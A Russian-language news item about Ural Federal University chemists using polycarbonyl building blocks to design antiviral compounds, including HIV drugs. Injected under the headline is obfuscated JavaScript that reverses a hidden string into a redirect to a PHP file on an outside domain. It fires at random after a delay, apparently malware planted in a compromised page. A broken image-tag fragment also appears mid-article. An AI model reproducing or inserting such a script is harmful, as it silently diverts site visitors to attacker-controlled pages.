На Урале изобрели "конструктор" для лекарств от ВИЧ

$NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top”>

05.02.2021 / 14:54
 Фото: Пресс-служба УрФУ
Фото: Пресс-служба УрФУ

Химики УрФУ предложили новый подход на основе органического синтеза для создания противовирусных препаратов, в том числе от ВИЧ.

Метод заключается в том, что полученные в лаборатории природные молекулы могут стать основой для новых биоактивных соединений. На основе этих соединений можно создавать эффективные и безопасные материалы.

tock-1205555904_(1)_t_310x206.jpg” srcset=”//cdnimg.rg.ru/img/content/203/64/16/iStock-1205555904_(1)_t_310x206.jpg 1920w” alt=”Фото: iStock” />

– Органический синтез можно сравнить с конструктором, где из простых деталей собираются сложные элементы. Мы используем простые молекулы и на их основе получаем более сложные структуры с необходимыми биологическими и физическими свойствами. У нас есть возможность изобретать новые молекулярные детали и способы их соединения – здесь появляется возможность для новых открытий и реакций, – рассказал доцент кафедры органической химии и высокомолекулярных соединений УрФУ Дмитрий Обыденнов.

В качестве деталей выступают поликарбонильные соединения. Вещества получаются из углеводов и широко распространены в природе. По словам ученого, это те же углеводы, что придают запах хлебу или сладкой вате.

– Эти соединения используются в биосинтезе. Они вдохновили нас на то, чтобы применять их для создания сложных молекул с высокой эффективностью. Также они связаны с “зеленой” химией, так как позволяют получать вещества на основе возобновляемых ресурсов, – говорит Дмитрий Обыденнов.

Важная особенность соединений – способность вводить фрагмент дикетокислоты в различные классы соединений. Этот фрагмент отвечает за биологическую активность за счет координации с коферментами металлоэнзимов (катионами металлов). Как раз эти органические соединения способны блокировать вирус при встраивании вирусной ДНК в ДНК-клетки хозяина. К классу таких препаратов относятся и современные лекарства от ВИЧ.

Ученый обратил внимание, что исследователи занимаются фундаментальной наукой, то есть, перед ними не стоит задача создать конкретной препарат. Они предлагают метод, молекулу, которая появилась в каталогах, и которой могут пользоваться фармацевты, чтобы создать лекарство, изучить его и запустить в производство.